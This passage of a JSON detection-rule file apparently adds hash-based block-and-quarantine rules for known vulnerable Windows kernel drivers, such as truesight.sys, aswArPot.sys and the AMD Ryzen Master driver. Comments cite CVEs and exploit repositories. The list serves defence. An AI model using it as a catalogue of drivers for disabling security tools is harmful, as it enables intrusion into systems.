+ "id": "74559025-6519-5942-9168-3de2542a624a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975184Z",
+ "creation_date": "2026-03-23T11:45:29.975186Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975191Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff9623317287358440ec67da9ba79994d9b17b99ffdd709ec836478fe1fc22a5",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "745fe60c-3216-5e5a-918c-c6cc49284a1f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609884Z",
+ "creation_date": "2026-03-23T11:45:29.609886Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609892Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0e291148da43ea6a491b8b94bdf573365087940c9b90f6a15a4e589da86a518d",
+ "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74741935-c3e3-5dd9-9e2f-58cd9cc0b340",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156690Z",
+ "creation_date": "2026-03-23T11:45:31.156691Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156697Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "145c0df9b3bd1e84373cec313183eb7273048b861c3bdc46d23597ee8807a156",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74766a75-53cf-5cd3-9f99-eb7db319c3bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494692Z",
+ "creation_date": "2026-03-23T11:45:31.494694Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494699Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e2cec63897dd10f604a4485aacb062e1546be7cb4d787557f0b37eddcf1edd8a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74889480-071e-5974-b914-5878e9ab1680",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828561Z",
+ "creation_date": "2026-03-23T11:45:30.828563Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828568Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd7bafa95c2e3dd217c40c03b3e5224daa6cf2b8969baaa9d7e3d90e172ea5e3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7488e995-e400-5d91-be4b-376c9206c052",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475856Z",
+ "creation_date": "2026-03-23T11:45:30.475859Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475868Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "72b67b6b38f5e5447880447a55fead7f1de51ca37ae4a0c2b2f23a4cb7455f35",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7492167f-7ebd-517f-8108-6c45cb37ca1b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818347Z",
+ "creation_date": "2026-03-23T11:45:30.818349Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818354Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "90574d2c406b9738aae8fc629c3983c5e47a6282a43b052f38b5dd313380c30a",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7495af6f-44cf-549a-b65c-e2fb0bf836c8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604664Z",
+ "creation_date": "2026-03-23T11:45:29.604666Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604672Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a689804c4e6e9aa07d48f9c99b7a1be6b05cba1c632b1a083b8031f6e1651c28",
+ "comment": "Vulnerable Kernel Driver (aka mydrivers.sys) [https://www.loldrivers.io/drivers/d9e00cc7-a8f4-4390-a6dc-0f5423e97da4/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74a4f858-1ec9-5461-b804-0cd57f1787be",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977414Z",
+ "creation_date": "2026-03-23T11:45:29.977417Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977426Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9d58f640c7295952b71bdcb456cae37213baccdcd3032c1e3aeb54e79081f395",
+ "comment": "Vulnerable Kernel Driver (aka ProtectS.sys) [https://www.loldrivers.io/drivers/99668140-a8f6-48f8-86d1-cf3bf693600c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74b2309d-00f0-5038-a8de-206213123154",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156327Z",
+ "creation_date": "2026-03-23T11:45:31.156329Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156335Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b1af3c4cd93f51d6aa2e77729fc7b8f0246dbcd08a022906dfddbce7bd430aaa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74b56757-e00c-51c1-9e0c-e8426c467bce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970089Z",
+ "creation_date": "2026-03-23T11:45:29.970090Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970096Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9d736f624a306d6e2399778dd92ab7f4f7ab33c6ca0528657bc026214f990a4f",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74bc10aa-13ec-5d1e-8aee-7d7889e1efbf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820651Z",
+ "creation_date": "2026-03-23T11:45:30.820653Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820658Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6d2cc7e1d95bb752d79613d0ea287ea48a63fb643dcb88c12b516055da56a11d",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74cc68b9-6c07-52b2-a64c-d5b104702f95",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153042Z",
+ "creation_date": "2026-03-23T11:45:31.153045Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153053Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8eaac070c8aab78970a262f7f2f072c546587ad98aff0211c2ba2450a3011d91",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74cccde6-396b-5bae-9688-0c46891d793b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146546Z",
+ "creation_date": "2026-03-23T11:45:31.146549Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146554Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cc2817ba92143e5ce61d39b25e41cc2af61c405dc3201b6e25463e70b88b008f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74cda055-ac2b-5cb9-9583-57688716e410", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620370Z", + "creation_date": "2026-03-23T11:45:29.620371Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620377Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9a1d66036b0868bbb1b2823209fedea61a301d5dd245f8e7d390bd31e52d663e", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "74d3557f-ba46-5358-9939-6bbbe91ee93e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968562Z", + "creation_date": "2026-03-23T11:45:29.968564Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.968570Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2ce81759bfa236913bbbb9b2cbc093140b099486fd002910b18e2c6e31fdc4f1", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "74d68951-fee8-5771-a7fe-683a0ebceb53", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819490Z", + "creation_date": "2026-03-23T11:45:31.819493Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819501Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ae69fe60af8e539c0448ff886b64a5b6cf4724118134d8e68fa1e038fd6bdf63", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "74dad053-0838-5502-85f5-3fc0587f52c7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148572Z", + "creation_date": "2026-03-23T11:45:31.148574Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148580Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9e5f9cd77bc75592166179972748adbd5f5ba1cee16befcfa65ac688ad8a6799", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "74db39c3-270a-5bc4-86e6-0ac39a8ec4e1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827085Z", + "creation_date": "2026-03-23T11:45:31.827087Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827093Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], 
+ "type": "hash", + "value": "cf433c0c2769fff006a0728b189c37683be8a77f7a981c9dce46c4eea6990e22", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "74eaa6f0-9357-5613-9e8e-8605a687c639", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813426Z", + "creation_date": "2026-03-23T11:45:31.813428Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813436Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e85389084d4e3680d8183d94089ca54e8d706305b4fe0400737d200c74c6fa11", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "74f8f6d6-8796-5fdc-8ed5-b4d8c962f2ed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144884Z", + "creation_date": "2026-03-23T11:45:32.144886Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144892Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aa20aa2316cd6d203146bd2bc5b7466ba7b83a8500654a688172bcafa82ab168", + "comment": "Vulnerable Kernel Driver (aka tboflhelper.sys) [https://www.loldrivers.io/drivers/07c57c69-c8d7-40cf-8bcc-612671427044/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7500a648-c37e-5c74-8f90-3a6ddf2cb00e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834965Z", + "creation_date": "2026-03-23T11:45:30.834969Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834978Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f262595446d780dccdc21575dc7ea3cc4693a183526d5e31df12af553f5f3c76", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "750e8b21-baa9-52ce-a9aa-f655379a3f5f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968596Z", + "creation_date": "2026-03-23T11:45:29.968598Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968604Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3b6e85c8fed9e39b21b2eab0b69bc464272b2c92961510c36e2e2df7aa39861b", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "751b809c-2385-56d1-925c-b3447281af4a", + 